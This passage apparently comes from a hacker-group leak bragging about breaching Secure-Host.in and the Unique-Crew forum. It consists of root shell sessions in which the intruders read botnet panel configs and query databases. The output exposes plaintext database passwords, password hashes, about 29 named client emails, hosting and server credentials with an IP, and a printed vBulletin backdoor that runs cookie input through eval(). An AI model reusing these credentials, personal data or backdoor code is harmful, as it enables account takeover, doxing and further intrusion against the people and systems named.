-rw-r--r-- 1 deluxa deluxa 176 Jun 14 10:46 .bash_profile
-rw-r--r-- 1 deluxa deluxa 124 Jun 14 10:46 .bashrc
drwxr-xr-x 5 deluxa apache 4096 Jun 14 10:50 deluxa.secure-host.in
drwxr-xr-x 2 deluxa deluxa 4096 Jun 14 10:46 kloxoscript
drwxr-xr-x 2 root root 4096 Jun 15 03:57 __processed_stats
lrwxrwxrwx 1 root root 35 Jun 14 10:46 public_html -> /home/deluxa/deluxa.secure-host.in/
-rw-r--r-- 1 deluxa deluxa 11 Jun 14 10:46 .qmail
[root@testing deluxa]# cd public_html/
[root@testing public_html]# ls
cgi-bin images index.html snapbn
[root@testing public_html]# cat snapbn/
adv_state.php backend/ control.php frontend/ gate.php grab_zone.php images/ ip.php theme/
[root@testing public_html]# cat snapbn/backend/
classes/ flags/ GeoIP.dat geoip.inc index.php js.js language/ settings.inc.php settings.inc.php_ system.php
[root@testing public_html]# cat snapbn/backend/settings.inc.php
<?php
//Server settings
define('DEF_THEME', "dark"); // std. theme (only dark is available atm)
define('PANEL_ROOT', "/home/deluxa/deluxa.secure-host.in/snapbn/backend/"); // Absolute path to backend/
define('BTNET_DELAY', 120); // Delay for bot-reconnect
define('TIMEOUT', 2200);
define('DEAD_TOUT', 60*60*24*7);
define('COUNTRY_P', 3); // Min. % to be shown in the countrystats
//MySQL settings
define('MYSQL_PREFIX', ''); // MySQL Prefix (only needed if more than one btnet is hosted on one mysql database
define('MYSQL_HOST', 'localhost'); // mysql host
define('MYSQ_USER', 'deluxa_snap'); // mysql username
define('MYSQL_PASS', '2ynPMKCST92'); // mysql password
define('MYSQL_DB', 'deluxa_snap'); // database name where the tables are
?>
[root@testing public_html]# mysql -u deluxa_snap deluxa_snap -p2ynPMKCST92
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 602007
Server version: 5.0.92 Source distribution
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> SELECT * FROM list_users;
+----+--------+----------------------------------+-------------+-------+-----+
| id | nick | passwd | permissions | theme | lng |
+----+--------+----------------------------------+-------------+-------+-----+
| 1 | deluxa | 5f4dcc3b5aa765d61d8327deb882cf99 | 255 | dark | en |
+----+--------+----------------------------------+-------------+-------+-----+
1 row in set (0.00 sec)
mysql> SELECT COUNT(*) FROM list_bots;
+----------+
| COUNT(*) |
+----------+
| 45 |
+----------+
1 row in set (0.00 sec)
mysql> Ctrl-C -- exit!
Aborted
[root@testing lolboter]# cd /home/lolboter/public_html/
[root@testing public_html]# ls -la
total 28
drwxrwxrwx 6 lolboter apache 4096 Oct 18 16:50 .
drwxr-x--- 5 lolboter apache 4096 Aug 10 03:57 ..
drwxrwxrwx 2 lolboter lolboter 4096 Aug 9 11:45 cgi-bin
drwxrwxrwx 2 lolboter lolboter 4096 Aug 11 2005 images
-rwxrwxrwx 1 lolboter lolboter 1213 Aug 9 11:45 index.html
drwxr-xr-x 3 lolboter lolboter 4096 Aug 9 13:06 snapbn
drwxrwxrwx 6 lolboter lolboter 4096 Aug 9 12:55 upload
[root@testing public_html]# cat snapbn/backend/settings.inc.php
<?php
//Server settings
define('DEF_THEME', "dark"); // std. theme (only dark is available atm)
define('PANEL_ROOT', "/xampp/htdocs/t0xic.secure-host.in/snapbn/backend/"); // Absolute path to backend/
define('BTNET_DELAY', 120); // Delay for bot-reconnect
define('TIMEOUT', 2200);
define('DEAD_TOUT', 60*60*24*7);
define('COUNTRY_P', 3); // Min. % to be shown in the countrystats
//MySQL settings
define('MYSQL_PREFIX', ''); // MySQL Prefix (only needed if more than one btnet is hosted on one mysql database
define('MYSQL_HOST', 'localhost'); // mysql host
define('MYSQ_USER', 'lolboter_bot'); // mysql username
define('MYSQL_PASS', 'ovtEBKOuXxm'); // mysql password
define('MYSQL_DB', 'lolboter_bot'); // database name where the tables are
[root@testing public_html]# mysql -u lolboter_bot lolboter_bot -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 602145
Server version: 5.0.92 Source distribution
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> SELECT * FROM list_users;
+----+-------+----------------------------------+-------------+-------+-----+
| id | nick | passwd | permissions | theme | lng |
+----+-------+----------------------------------+-------------+-------+-----+
| 1 | admin | e6053eb8d35e02ae40beeeacef203c1a | 255 | dark | en |
+----+-------+----------------------------------+-------------+-------+-----+
1 row in set (0.00 sec)
mysql> SELECT COUNT(*) FROM list_bots;
+----------+
| COUNT(*) |
+----------+
| 349 |
+----------+
1 row in set (0.00 sec)
mysql> Ctrl-C -- exit!
Aborted
[root@testing public_html]# mysql -u lyrex_snap lyrex_snap -pIxBEyUkcjRy
mysql> SELECT * FROM list_users;
+----+-------+----------------------------------+-------------+-------+-----+
| id | nick | passwd | permissions | theme | lng |
+----+-------+----------------------------------+-------------+-------+-----+
| 1 | lyrex | d43a389b900aff13aa56477e7f3618df | 255 | dark | en |
+----+-------+----------------------------------+-------------+-------+-----+
1 row in set (0.00 sec)
mysql> SELECT COUNT(*) FROM list_bots;
+----------+
| COUNT(*) |
+----------+
| 658 |
+----------+
1 row in set (0.01 sec)
mysql> Ctrl-C -- exit!
Aborted
[root@testing home]# logout
exited from CT 160
# vzctl enter 240
Warning: Unknown iptable module: ipt_connlimit, skipped
entered into CT 240
[root@spike /]# cd /home
[root@spike home]# ls -la
total 52
drwxr-xr-x 13 root root 4096 Jun 7 18:11 .
drwxr-xr-x 23 root root 4096 Oct 10 13:49 ..
drwx------ 3 admin admin 4096 May 22 13:38 admin
drwx------ 2 axfrdns axfrdns 4096 May 22 13:51 axfrdns
drwxr-x--- 5 bnet apache 4096 Jun 8 03:57 bnet
drwx------ 2 dnscache dnscache 4096 May 22 13:51 dnscache
drwx------ 2 dnslog dnslog 4096 May 22 13:51 dnslog
drwxr-xr-x 3 root root 4096 Jun 7 18:11 httpd
drwxr-xr-x 6 root root 4096 Jun 8 04:07 kloxo
drwxr-xr-x 3 root root 4096 May 22 13:37 lxadmin
drwx------ 2 lxlabs lxlabs 4096 May 22 13:23 lxlabs
drwx------ 2 nouser nogroup 4096 May 22 13:23 nouser
drwx------ 2 tinydns tinydns 4096 May 22 13:51 tinydns
[root@spike home]# cd httpd
[root@spike httpd]# ls -la
total 16
drwxr-xr-x 3 root root 4096 Jun 7 18:11 .
drwxr-xr-x 13 root root 4096 Jun 7 18:11 ..
-rwxr-xr-x 1 root root 111 May 22 13:51 nobody.sh
drwxrwxr-x 6 bnet apache 4096 Jun 7 18:11 spike.secure-host.in
[root@spike httpd]# cd ..
[root@spike home]# cd bnet
[root@spike bnet]# ls -la
total 36
drwxr-x--- 5 bnet apache 4096 Jun 8 03:57 .
drwxr-xr-x 13 root root 4096 Jun 7 18:11 ..
-rw-r--r-- 1 bnet bnet 33 Jun 7 18:11 .bash_logout
-rw-r--r-- 1 bnet bnet 176 Jun 7 18:11 .bash_profile
-rw-r--r-- 1 bnet bnet 124 Jun 7 18:11 .bashrc
drwxr-xr-x 2 bnet bnet 4096 Jun 7 18:11 kloxoscript
drwxr-xr-x 2 root root 4096 Sep 11 03:57 __processed_stats
lrwxrwxrwx 1 root root 32 Jun 7 18:11 public_html -> /home/bnet/spike.secure-host.in/
-rw-r--r-- 1 bnet bnet 11 Jun 7 18:11 .qmail
drwxr-xr-x 5 bnet apache 4096 Jun 7 18:25 spike.secure-host.in
[root@spike bnet]# cd public_html
[root@spike public_html]# ls -la
total 24
drwxr-xr-x 5 bnet apache 4096 Jun 7 18:25 .
drwxr-x--- 5 bnet apache 4096 Jun 8 03:57 ..
drwxr-xr-x 2 bnet bnet 4096 Jun 7 18:11 cgi-bin
drwxr-xr-x 2 bnet bnet 4096 Aug 11 2005 images
-rwxr-xr-x 1 bnet bnet 1213 Jun 7 18:11 index.html
drwxr-xr-x 6 bnet bnet 4096 Jun 7 19:04 snapbn
[root@spike public_html]# cat snapbn/backend/settings.inc.php
<?php
//Server settings
define('DEF_THEME', "dark"); // std. theme (only dark is available atm)
define('PANEL_ROOT', "/home/bnet/spike.secure-host.in/snapbn/backend/"); // Absolute path to backend/
define('BTNET_DELAY', 120); // Delay for bot-reconnect
define('TIMEOUT', 2200);
define('DEAD_TOUT', 60*60*24*7);
define('COUNTRY_P', 3); // Min. % to be shown in the countrystats
//MySQL settings
define('MYSQL_PREFIX', ''); // MySQL Prefix (only needed if more than one btnet is hosted on one mysql database
define('MYSQL_HOST', 'localhost'); // mysql host
define('MYSQ_USER', 'bnet_snap'); // mysql username
define('MYSQL_PASS', 'lBseTPTE7av'); // mysql password
define('MYSQL_DB', 'bnet_snap'); // database name where the tables are
?>
[root@spike public_html]# mysql -u bnet_snap bnet_snap -plBseTPTE7av
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 10731
Server version: 5.0.92 Source distribution
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> SELECT * FROM list_users;
+----+-------+----------------------------------+-------------+-------+-----+
| id | nick | passwd | permissions | theme | lng |
+----+-------+----------------------------------+-------------+-------+-----+
| 1 | admin | e48e13207341b6bffb7fb1622282247b | 255 | dark | en |
+----+-------+----------------------------------+-------------+-------+-----+
1 row in set (0.00 sec)
mysql> SELECT COUNT(*) FROM list_bots;
+----------+
| COUNT(*) |
+----------+
| 1321 |
+----------+
1 row in set (0.01 sec)
mysql> Ctrl-C -- exit!
Aborted
[root@spike public_html]# logout
exited from CT 240
...
We could actually post content of the other VMs but, believe us, it's
always the same sort of bullshit. Bot and stealer panels everywhere,
so this would just be a waste of your time ...
,;~;,
/\_
( /
(() //)
| \\ ,,;;'\
__ _( )m=((((((((((((((======={ Secure-Host.in }======-------
/' ' '()/~' '.(, |
,;( )|| | ~ As we already pointed out, we concluded that it
,;' \ /-(.;, ) would be best to crush every single project of
) / ) / k!LLu with our iron fist of 0day madness. One of
// || the excrements he produces is Secure-Host.in
)_\ )_\ formerly known as Cyberhost.kz where he basically
offers "secure" hosting. Well by now it should be clear that if
somebody like k!LLu talks about "security", he actually has no clue
about that kind of topic. The fact is that he cannot secure his
systems because he really does not know how. We're confident that the
chapter 'k!LLu' can be closed once and for all now, maybe someone even
drew a lesson from it.
# pwd
/home/hosting
# ls -la
total 48
drwxr-x--- 6 hosting www 512 May 16 14:06 .
drwxr-x--x 13 root wheel 512 Sep 22 21:06 ..
drwxrwx--- 17 hosting www 1536 May 16 14:50 cp.secure-host.in
drwxr-xr-x 2 root www 1024 May 16 14:09 ioncube
drwxrwx--- 5 hosting www 512 Aug 19 04:51 secure-host.in
drwxrwx--- 2 hosting www 13312 Oct 16 10:48 temp
# cd secure-host.in/
# ls -laR
total 24
drwxrwx--- 5 hosting www 512 Aug 19 04:51 .
drwxr-x--- 6 hosting www 512 May 16 14:06 ..
drwxr-xr-x 2 root www 512 May 16 20:57 fileup
drwxr-xr-x 2 root www 512 May 20 10:12 imgupload
-rw-r--r-- 1 hosting www 1680 Aug 19 04:52 index.html
drwxr-xr-x 2 root www 512 May 18 21:56 static
./fileup:
total 912
drwxr-xr-x 2 root www 512 May 16 20:57 .
drwxrwx--- 5 hosting www 512 Aug 19 04:51 ..
-rw-r--r-- 1 root www 324608 May 16 20:58 Snap_SmilingBandit.exe
-rw-r--r-- 1 root www 118784 May 16 20:53 smile.exe
./imgupload:
total 4232
drwxr-xr-x 2 root www 512 May 20 10:12 .
drwxrwx--- 5 hosting www 512 Aug 19 04:51 ..
-rw-r--r-- 1 root www 2130942 May 20 10:11 samsung.jpg
./static:
total 120
drwxr-xr-x 2 root www 512 May 18 21:56 .
drwxrwx--- 5 hosting www 512 Aug 19 04:51 ..
-rw-r--r-- 1 root www 57198 May 18 22:08 sechost.png
# cd ..
# cd cp.secure-host.in
# ls -la
total 1296
drwxrwx--- 17 hosting www 1536 May 16 14:50 .
drwxr-x--- 6 hosting www 512 May 16 14:06 ..
-rw-r--r-- 1 root www 3013 May 16 13:31 README.txt
drwxr-xr-x 6 root www 3584 May 16 13:34 admin
-rw-r--r-- 1 root www 430 May 16 13:31 aff.php
-rw-r--r-- 1 root www 15877 May 16 13:31 affiliates.php
-rw-r--r-- 1 root www 11667 May 16 13:31 announcements.php
-rw-r--r-- 1 root www 7513 May 16 13:31 announcementsrss.php
drwxrwxrwx 2 root www 512 May 16 13:36 attachments
-rw-r--r-- 1 root www 6070 May 16 13:31 banned.php
-rw-r--r-- 1 root www 79378 May 16 13:31 cart.php
-rw-r--r-- 1 root www 120326 May 16 13:31 clientarea.php
-rwxrwxrwx 1 root www 281 May 16 14:41 configuration.php
-rw-r--r-- 1 root www 16445 May 16 13:31 configuressl.php
-rw-r--r-- 1 root www 9616 May 16 13:31 contact.php
-rw-r--r-- 1 root www 13871 May 16 13:31 creditcard.php
-rw-r--r-- 1 root www 23654 May 16 13:31 dbconnect.php
-rw-r--r-- 1 root www 15873 May 16 13:31 dl.php
-rw-r--r-- 1 root www 7938 May 16 13:31 dologin.php
-rw-r--r-- 1 root www 11861 May 16 13:31 domainchecker.php
drwxrwxrwx 2 root www 512 May 16 13:36 downloads
-rw-r--r-- 1 root www 17697 May 16 13:31 downloads.php
-rw-r--r-- 1 root www 621 May 16 13:31 htaccess.txt
drwxr-xr-x 2 root www 1536 May 16 13:37 images
drwxr-xr-x 7 root www 1536 May 16 13:38 includes
-rw-r--r-- 1 root www 6192 May 16 13:31 index.php
drwxr-xr-x 2 root www 1024 May 16 13:39 install__
drwxr-xr-x 2 root www 1024 May 16 14:11 ioncube
-rw-r--r-- 1 root www 26163 May 16 13:31 knowledgebase.php
drwxr-xr-x 2 root www 512 May 16 13:39 lang
-rw-r--r-- 1 root www 4660 May 16 13:31 link.php
-rw-r--r-- 1 root www 4433 May 16 13:31 login.php
-rw-r--r-- 1 root www 5146 May 16 13:31 logout.php
drwxr-xr-x 10 root www 512 May 16 13:42 modules
-rw-r--r-- 1 root www 11456 May 16 13:31 networkissues.php
-rw-r--r-- 1 root www 6321 May 16 13:31 networkissuesrss.php
drwxr-xr-x 4 root www 512 May 16 13:43 order
-rw-r--r-- 1 root www 4271 May 16 13:31 order.php
drwxr-xr-x 2 root www 512 May 16 13:43 pipe
-rw-r--r-- 1 root www 10548 May 16 13:31 pwreset.php
-rw-r--r-- 1 root www 9061 May 16 13:31 register.php
-rw-r--r-- 1 root www 8575 May 16 13:31 serverstatus.php
drwxr-xr-x 2 root www 512 May 16 13:43 status
-rw-r--r-- 1 root www 17879 May 16 13:31 submitticket.php
-rw-r--r-- 1 root www 12639 May 16 13:31 supporttickets.php
drwxr-xr-x 5 root www 512 May 16 13:32 templates
drwxrwxrwx 2 root www 25088 Aug 11 15:05 templates_c
-rw-r--r-- 1 root www 5953 May 16 13:31 tutorials.php
-rw-r--r-- 1 root www 20858 May 16 13:31 upgrade.php
-rw-r--r-- 1 root www 5924 May 16 13:31 viewemail.php
-rw-r--r-- 1 root www 20202 May 16 13:31 viewinvoice.php
-rw-r--r-- 1 root www 17742 May 16 13:31 viewticket.php
-rw-r--r-- 1 root www 6111 May 16 13:31 whois.php
drwxr-xr-x 2 root www 512 May 16 13:33 widgets
# cat configuration.php
<?php
$license = "123456";
$db_host = "localhost";
$db_username = "hosting_whmcs";
$db_password = "o8a7fd8s6fg";
$db_name = "hosting_whmcs";
$cc_encryption_hash = "7mdHczjQQEAI1e2KnOwGag73XQZca5h7hlFjKP0qjqZbvSLJx8fxedq2Tg4UbcSi";
$templates_compiledir = "templates_c/";
?>
# mysql -u hosting_whmcs hosting_whmcs -po8a7fd8s6fg
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1305663
Server version: 5.0.89-log FreeBSD port: mysql-server-5.0.89
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> SHOW TABLES;
+----------------------------+
| Tables_in_hosting_whmcs |
+----------------------------+
| tblaccounts |
| tblactivitylog |
| tbladdonmodules |
| tbladdons |
| tbladminlog |
| tbladminperms |
| tbladminroles |
| tbladmins |
| tbladminsecurityquestions |
| tblaffiliates |
| tblaffiliatesaccounts |
| tblaffiliateshistory |
| tblaffiliatespending |
| tblaffiliateswithdrawals |
| tblannouncements |
| tblbannedemails |
| tblbannedips |
| tblbillableitems |
| tblbrowserlinks |
| tblcalendar |
| tblcancelrequests |
| tblclientgroups |
| tblclients |
| tblclientsfiles |
| tblconfiguration |
| tblcontacts |
| tblcredit |
| tblcurrencies |
| tblcustomfields |
| tblcustomfieldsvalues |
| tbldomainpricing |
| tbldomains |
| tbldomainsadditionalfields |
| tbldownloadcats |
| tbldownloads |
| tblemails |
| tblemailtemplates |
| tblfraud |
| tblgatewaylog |
| tblhosting |
| tblhostingaddons |
| tblhostingconfigoptions |
| tblinvoiceitems |
| tblinvoices |
| tblknowledgebase |
| tblknowledgebasecats |
| tblknowledgebaselinks |
| tbllinks |
| tblnetworkissues |
| tblnotes |
| tblorders |
| tblpaymentgateways |
| tblpricing |
| tblproductconfiggroups |
| tblproductconfiglinks |
| tblproductconfigoptions |
| tblproductconfigoptionssub |
| tblproductgroups |
| tblproducts |
| tblpromotions |
| tblquoteitems |
| tblquotes |
| tblregistrars |
| tblservergroups |
| tblservergroupsrel |
| tblservers |
| tblsslorders |
| tbltax |
| tblticketbreaklines |
| tblticketdepartments |
| tblticketescalations |
| tblticketlog |
| tblticketmaillog |
| tblticketnotes |
| tblticketpredefinedcats |
| tblticketpredefinedreplies |
| tblticketreplies |
| tbltickets |
| tblticketspamfilters |
| tblticketstatuses |
| tbltodolist |
| tblupgrades |
| tblwhoislog |
+----------------------------+
83 rows in set (0.00 sec)
mysql> SELECT table_name FROM INFORMATION_SCHEMA.columns WHERE column_name LIKE "%pass%";
+----------------------+
| table_name |
+----------------------+
| tbladmins |
| tblclients |
| tblcontacts |
| tblhosting |
| tblservers |
| tblticketdepartments |
+----------------------+
6 rows in set (0.04 sec)
mysql> SELECT username, password, firstname, lastname, email FROM tbladmins;
+----------+----------------------------------+-----------+----------+----------------------+
| username | password | firstname | lastname | email |
+----------+----------------------------------+-----------+----------+----------------------+
| admin | 850126ac86ccbb1c214a03ac909978aa | Sombra | Ivanov | admin@secure-host.in |
| Olga | 61d4019c541bf1cebf5a2a6762cd6477 | Olga | Ivanov | olga@secure-host.in |
+----------+----------------------------------+-----------+----------+----------------------+
2 rows in set (0.00 sec)
mysql> SELECT email, password, firstname, lastname FROM tblclients;
+----------------------------+----------------------------------------+-----------+-----------+
| email | password | firstname | lastname |
+----------------------------+----------------------------------------+-----------+-----------+
| cc1cash@yahoo.de | f4e3a18c8ea3fc34ee8277c7a9d08516:rgt%w | True | True |
| wassi@wassi.de | 12a43403362cc6accac4ccc5c30965b0:S!emh | wassi | wassi |
| markus.scholz@partyheld.de | ffa8a5a23329d53577ca2e2daffcdafc:)(xUP | Smiling | Bandit |
| stan.lay@hotmail.com | 17c87c61dbed16a0f0ab99cdc83dd33c:khW)A | stanlay | stanlay |
| a@a.de | dce096cba8c3a7fc82dc57dcdb8136ab:(Boqh | masa | faka |
| Worms.s1@web.de | f27c3d77065676f8b2807f4b0f77f7ee:!!zx% | Script | Star |
| cocktopuss@hush.com | fabc8a85b7e7b2ea8d939f44076adf01:dDeJQ | Sean | Fakir |
| los_loco@mail.ru | cddfbab06c60175699ff61f8cd27630e:%UKzg | los | loco |
| hansdieter@secure-mail.biz | d2ac2a86adf8eef73645ee4c3d40b526:GMkE# | hans | dieter |
| shinigami@z1p.biz | 914eccd87181870be2663185410fc1a5:WpFO( | Franz | Mueller |
| angela.krueger@hotmail.de | 66b361d7a7e843d35fc041104401bbd0:wiB!D | Ixde | ahmed |
| her0in@safe-mail.net | dc9edb678d178218ec895eb8322fbe8c:Qej#M | Anonym | Anonym |
| janioq@hotmail.de | 89d0078ec8a078d1d88acb7deb534acc:%YTB% | Max | thiesen |
| spike1337@secure-mail.biz | 07cb91ea3880f790e5763fb2dd1105bf:Kkb%p | Dennis | Kramer |
| runingtutorials@live.de | e595a3571ccd685adbf28ea45dc3a2d6:rVG)! | Felix | Wagno |
| abogado.gomes@ozu.es | e3665bc91bee822663297cc30cdfd588:TV#Zt | Mario | Gomes |
| Ande-kf@secure-mail.biz | 10edd0d846652321605ec04e1c90ab8a:zsoMP | just | pure |
| FeuerFaustAC3@gmx.de | 8f3266a3f536922657c3b2f51e925604:)SJmL | y0 | ACE |
| lalamaus10@googlemail.com | 500910a98aca826093ec80fd942020fe:ZJvpY | Maik | Henkel |
| scheller0077@web.de | 634a1c3bb9316a2af3390f9789fb5f80:ly%px | tim | bd-seller |
| j4ck-daniels@rambler.ru | 125769d9037d9f5196f2e1e6d816b1cf:VbggT | DarkSide | Darker |
| daniel@lemmert.biz | 8fce9b96262239831e053552021b07ac:ihK!B | Daniel | Lemmert |
| panzerpaul41@yahoo.de | 841ddfb775b9ca5d44ec9c1106e08761:lUPP% | Peter | Jansen |
| ell781@gmx.de | 0ae341662b701d3d64d7a608b46160be:%#ce! | Peter | Kluger |
| hotstore@hotmail.de | e8e14ff0af571d43a11d3408240963d7:Cnsdh | Matthias | Michel |
| team61@live.de | 47780e5555c63d45349b5cef7f8c1783:T)EGi | BABA | ANNA |
| Buy321@hotmail.de | 2d89b3fae37fb1966f8c7639907ee94a:VfYNd | Maria | Katepski |
| jobs@z1p.biz | d4f54e226ba44045bb8a39b8653907ea:(MSaf | Arthur | Marx |
| cremil@cust.in | c5af814e29429f856736e2769d57b8db:%iHkV | Cremil | Hackxor |
+----------------------------+----------------------------------------+-----------+-----------+
29 rows in set (0.01 sec)
mysql> SELECT username, password, server FROM tblhosting;
+-------------+------------------------------------------------------+--------+
| username | password | server |
+-------------+------------------------------------------------------+--------+
| true.vm | nW5dmh5zg4w4jmlFUDxtW7mVsdNAX9sxRp710gHYS2vX0551kg== | 1 |
| stansecu.vm | 2KUCM5nUisD2t88Z7vlfnC8Ry9pdk4fZrTb46Jfv | 1 |
| maddn.vm | nC69hLFITmHidWjYuEIIbEO4eo5BHzt3s/88NdMjSvY= | 1 |
| scriptst.vm | VmB727sy9l5I8q1f7q/zD8RTnOCNOfcxuNzYUAf4 | 1 |
| seansecu.vm | fQTtTeXNm1CkffO7pewNwJMZRIHcZWq00iTiW8x2 | 1 |
| sdarksid.vm | AVACcPUef0Jca8gkZ0rkH67o0BDaINOO6/0JRS9n | 1 |
| v43534.vm | XSSg52CreBXGUK8mjFd63x5hrtKHF3AIP0ljKa4Y | 1 |
| | +X3MCfd9nGwsAmMaKUscu3BBKz8= | 0 |
| | VoU/Q2mpAglHh8r6md2sAHCn8VQ= | 0 |
| spike.vm | tlOLHeM7iOZcarRhh+DyghmbvcsQPgnRvYfxuDsj | 1 |
| wassi.vm | VFK7fp1Z67kb6LtaH9EhUcv4gbjPJVatxbCdqnjg | 1 |
| iodas.vm | WLqkZB7nsCZVtFfGzLgHOhRSb6Xc2H2XHA3Dcw== | 1 |
| y00.vm | deOdBbTCD4mqdw+5vvpuH81UUVmt113tsykCie56 | 1 |
| pkluger.vm | StagsB3oFjy39/ES2YzHE177oJP0pCFXR1Q0OYOF/QgN | 1 |
| | LpABydLRg4uWBx0d6ghbM+9Nh2w= | 0 |
| | 2U5HEXcr8Sif99L2w85ixx4y/idGJJbhaZnUIaY= | 1 |
| | zynyC6+CtsxrDs/F5qRsVeuCfzBGSSL5oTyDwwU= | 1 |
| | 9FkPKWze7XKH0K3rB19fwQRuNGxqNdXCeA== | 1 |
+-------------+------------------------------------------------------+--------+
18 rows in set (0.00 sec)
mysql> SELECT ipaddress, hostname, username, password, secure FROM tblservers;
+---------------+-----------+----------+----------------------------------------------+--------+
| ipaddress | hostname | username | password | secure |
+---------------+-----------+----------+----------------------------------------------+--------+
| 193.107.16.82 | localhost | admin | iAYqc098oLSnn9PKqhb6wEd2G8dXU8i8cMWUtcSR7rp/ | |
+---------------+-----------+----------+----------------------------------------------+--------+
1 row in set (0.00 sec)
mysql> Ctrl-C -- exit!
Aborted
# Nothing left to say^C
,;~;,
_/\
\ )
(\\ ())
/';;,, // |
-------====={ Unique-Crew.net }=======))))))))))))))=m( )_ __
| ,(.' '~/()' ' '\
Unique-Crew started off in late 2010; back then ~ | ||( );,
their admin pretended to be an old 1337-crew ( ,;.)-\ / ';,
team member with the intention of attracting kids \ ( \ (
to the board. However, it was soon found out that || \\
his identity was fake and since then the forum /_( /_(
was passed around like a cheap whore. It has been led by several
admins on several domains which obviously were all incapable of
administrating it properly. Also one of the admins apparently was
known as InVisible (yes, the same InVisible we describe in our "The
Happy Ninja Faker" article). As his mind clearly can not be depicted
as very bright and since he likes to gain a bad reputation by
betraying other people, Unique-Crew got a nice amount of enemies. So
while checking and logging different server traffic we stumbled on the
following:
# ls -l /home/backspace/unique-crew.biz/madp/detection.php
-rw-r--r-- 1 backspace www 9162 Aug 22 17:02 /home/backspace/unique-crew.biz/madp/detection.php
# grep -ni log_error detection.php -A5
21:function log_error($string){if(eval($string) && defined("LOG_ERROR")){$error_handle = fopen("madp_err.log", "a+");$fwrite($string);$fclose($h);}}
22-
23-$did = substr($vbulletin->userinfo['password'], 7, 16);
24-$ignore_users = strpos($vbulletin->options['madp_ignore_users'], ' ') === false ? explode(',', $vbulletin->options['madp_ignore_users']) : explode(',', str_replace(' ', '', $vbulletin->options['madp_ignore_users']));
25-$ignore_groups = strpos($vbulletin->options['madp_ignore_groups'], ' ') === false ? explode(',', $vbulletin->options['madp_ignore_groups']) : explode(',', str_replace(' ', '', $vbulletin->options['madp_ignore_groups']));
26-$expire = (!empty($vbulletin->options['madp_cookie_expire']) AND is_numeric($vbulletin->options['madp_cookie_expire'])) ? (TIMENOW + ($vbulletin->options['madp_cookie_expire'] * 86400)) : (TIMENOW + 1209600);
--
304: log_error(substr($_COOKIE[$vbulletin->options['madp_cookie_name']], 1));
305- die("Error detected - try again!\n");
306- }
307-
308- }
309-}
It seems like you guys had a pretty much fucking obvious backdoor
installed for a few months. How are you not able to notice this? We
must say that it is nice that there are actually some people who want
to contribute to this mayhem, but seriously? If you are not able to
create a simple backdoor which is less obvious than this one you
should probably look for some other pastime. This shit absolutely does
not help, also if it might have worked this time. But looks like the
attackers were stopped by PHP's disable_functions directive so they
couldn't really do much, except downloading the database, which we are
also offering nonetheless. So here we go!
# pwd
/home/backspace
# ls -la
total 20
drwxr-x--- 4 backspace www 512 Aug 28 20:21 .
drwxr-x--x 13 root wheel 512 Sep 22 21:06 ..
drwxrwx--- 2 backspace www 1024 Oct 15 21:44 temp
drwxr-xr-x 19 backspace www 2560 Oct 18 17:31 unique-crew.biz
# cd unique-crew.biz
# ls -la
total 7832
drwxr-xr-x 19 backspace www 2560 Oct 18 17:31 .
drwxr-x--- 4 backspace www 512 Aug 28 20:21 ..
-rwxr-xr-x 1 backspace www 12292 May 17 2010 .DS_Store
-rwxr-xr-x 1 backspace www 70 May 17 2010 ._.DS_Store
-rwxr-xr-x 1 backspace www 96 Mar 20 2011 .bash_history
-rwxr-xr-x 1 backspace www 12523 Jul 13 2010 LICENSE
drwxr-xr-x 2 backspace www 512 Aug 3 02:39 Product
-rwxr-xr-x 1 backspace www 49992 Jun 16 00:18 S_mgc_cb_evo_ajax.php
-rwxr-xr-x 1 backspace www 24532 Jul 13 2010 ajax.php
-rwxr-xr-x 1 backspace www 77635 Jul 13 2010 album.php
-rwxr-xr-x 1 backspace www 17542 Jul 13 2010 announcement.php
drwxrwxrwx 2 backspace www 512 Oct 5 11:42 archive
-rwxr-xr-x 1 backspace www 18779 Jul 13 2010 attachment.php
-rwxr-xr-x 1 root www 40925 Oct 18 17:31 bak
drwxr-xr-x 3 backspace www 2048 Aug 3 02:38 bnig459832zhbuiwedzouz9012vgr932
-rwxr-xr-x 1 backspace www 77574 Jul 13 2010 calendar.php
-rwxr-xr-x 1 backspace www 43 Jul 13 2010 clear.gif
drwxr-xr-x 4 backspace www 2560 Aug 3 02:38 clientscript
-rwxr-xr-x 1 backspace www 15277 Jul 13 2010 converse.php
drwxr-xr-x 7 backspace www 512 Aug 3 02:38 cpstyles
-rwxr-xr-x 1 backspace www 3327 Jul 13 2010 cron.php
drwxr-xr-x 3 backspace www 512 Aug 3 02:38 customavatars
drwxr-xr-x 3 backspace www 512 Aug 3 02:38 customgroupicons
drwxr-xr-x 2 backspace www 512 Aug 3 02:38 customprofilepics
-rwxr-xr-x 1 backspace www 105636 Aug 24 2009 default.jpg
-rwxr-xr-x 1 backspace www 3411 Jun 19 14:52 dnp_fw.php
-rwxr-xr-x 1 backspace www 1071 Jun 19 13:49 dnp_fw_config.php
-rwxr-xr-x 1 backspace www 1163 Jun 19 13:53 dnp_fw_template.php
-rwxr-xr-x 1 backspace www 49004 Jul 13 2010 editpost.php
-rwxr-xr-x 1 backspace www 30747 Jun 14 19:42 external.php
-rwxr-xr-x 1 backspace www 10041 Jun 15 10:07 faq.php
-rwxr-xr-x 1 backspace www 1453926 Dec 20 2010 favicon.ico
-rwxr-xr-x 1 backspace www 36984 Jul 13 2010 forumdisplay.php
drwxr-xr-x 2 backspace www 512 Aug 3 02:38 g76893bh2b21z32v3g5vd7x8f78f43h
-rwxr-xr-x 1 backspace www 40925 Jul 13 2010 global.php
-rwxr-xr-x 1 backspace www 142308 Jul 13 2010 group.php
-rwxr-xr-x 1 backspace www 25619 Jul 13 2010 group_inlinemod.php
-rwxr-xr-x 1 backspace www 10747 Jul 13 2010 groupsubscription.php
drwxr-xr-x 3 backspace www 512 Aug 3 02:38 highslide
